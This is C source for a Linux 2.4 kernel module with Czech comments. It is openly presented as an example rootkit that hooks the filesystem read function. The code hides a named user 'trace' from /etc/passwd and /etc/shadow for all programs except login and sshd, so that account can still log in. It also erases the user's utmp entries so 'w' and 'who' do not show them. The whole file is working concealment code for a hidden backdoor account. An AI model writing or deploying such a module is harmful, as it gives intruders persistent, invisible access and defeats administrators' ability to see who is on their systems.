/* 
 * priklad skryvani zaznamu v souborech hookovanim 
 * VFS funkce read
 *
 * tento modul skryva 
 * 	- HIDDEN_USERNAME z /etc/passwd & /etc/shaddow, pro 
 * 	  vsechny procesy krome sshd a login, takze se skryty 
 * 	  uzivatel muze prihlasit
 * 	  
 * 	- HIDDEN_USERNAME ve vypisu `w' a `who', takze uzivatel 
 * 	  zustane "neviditelny" i po prihlaseni
 *
 * 	  modul je urcen pro jadra 2.4
 * 	
 *	                              -( trace@dump.cz )-
 */

#define MODULE
#define __KERNEL__

#include <linux/types.h>
#include <linux/module.h>
#include <linux/kernel.h>

#include <linux/sched.h>
#include <linux/fs.h>

#define HIDDEN_UID		1000
#define HIDDEN_USERNAME	"trace"


ssize_t (*old_gfr)(struct file *, char *, size_t , loff_t *); 

int remove_line(char *buffer, char *str)
{
	char *ptr = strstr(buffer, str);
	char *prev_line = ptr, *next_line = ptr;
	int rest_length = 0;
	int line_length = 0;
	
	if (ptr == NULL) return 0;
	
	while (prev_line > buffer && *prev_line != '\n') prev_line--;
	while (*next_line != 0 && *next_line != '\n') next_line++;

	line_length = next_line - prev_line;
	
	if (prev_line == ptr) next_line++;
	
	ptr = next_line;
	while (*(ptr++) != 0)
		rest_length++;

	while (next_line <= ptr)
		*(prev_line++) = *(next_line++);

	return line_length;
}

#define UT_LINESIZE	32
#define UT_NAMESIZE	32
#define UT_HOSTSIZE	256

struct exit_status {
    short int e_termination;	/* Process termination status.  */
    short int e_exit;		/* Process exit status.  */
};


struct utmp {
  short int ut_type;		/* Type of login.  */
  pid_t ut_pid;			/* Process ID of login process.  */
  char ut_line[UT_LINESIZE];	/* Devicename.  */
  char ut_id[4];		/* Inittab ID.  */
  char ut_user[UT_NAMESIZE];	/* Username.  */
  char ut_host[UT_HOSTSIZE];	/* Hostname for remote login.  */
  struct exit_status ut_exit;	/* Exit status of a process marked
				   as DEAD_PROCESS.  */
  long int ut_session;		/* Session ID, used for windowing.  */
  struct timeval ut_tv;		/* Time entry was made.  */
  int32_t ut_addr_v6[4];	/* Internet address of remote host.  */
  char __unused[20];		/* Reserved for future use.  */
};


/* - hide line with HIDDEN_USERNAME from /etc/passwd and /etc/shaddow for all
 *   programs except `login' and `sshd'
 * - hide HIDDEN_USERNAME's entry in `w' and `who'
 */
ssize_t new_gfr(struct file *f, char *buf, size_t count, loff_t *ppos) 
{
	ssize_t res = old_gfr(f, buf, count, ppos);

	/* we don't hide anything for our hidden user */
	if (current->uid == HIDDEN_UID)	return res;
	
	if (f && f->f_dentry) {
		if ((!strcmp(f->f_dentry->d_name.name, "passwd") ||
		     !strcmp(f->f_dentry->d_name.name, "shadow")) &&
		     strcmp(current->comm, "login") && 
		     strcmp(current->comm, "sshd")) 
		{
			/* pokud buf obsahuje jmeno skryteho uzivatele, 
			 * dany radek se odstrani a odecte se celkovy pocet 
			 * bajtu */
			if (strstr(buf, HIDDEN_USERNAME)) 
				return res - remove_line(buf, HIDDEN_USERNAME);
		}
	
		
		if (!strcmp(f->f_dentry->d_name.name, "utmp")) {
			struct utmp *utmp_entry = (struct utmp *) buf;
			if (utmp_entry && !strcmp(utmp_entry->ut_user, HIDDEN_USERNAME)) {
				memset(utmp_entry, 0, sizeof(struct utmp));
				return 0;
			}
		}


	}
	return res;
}


int init_module() {
	struct file *f;
	
	f = filp_open("/etc/passwd", O_RDONLY, 0600);
	if (!IS_ERR(f)) {
		if (f && f->f_op) {
			old_gfr = f->f_op->read;
			f->f_op->read = new_gfr;
		}
		filp_close(f, NULL);
	}
	
	return 0;
}

void cleanup_module() {
	struct file *f;

	f = filp_open("/etc/passwd", O_RDONLY, 0600);
	if (!IS_ERR(f)) {
		if (f && f->f_op) f->f_op->read = old_gfr;
		filp_close(f, NULL);
	}
}

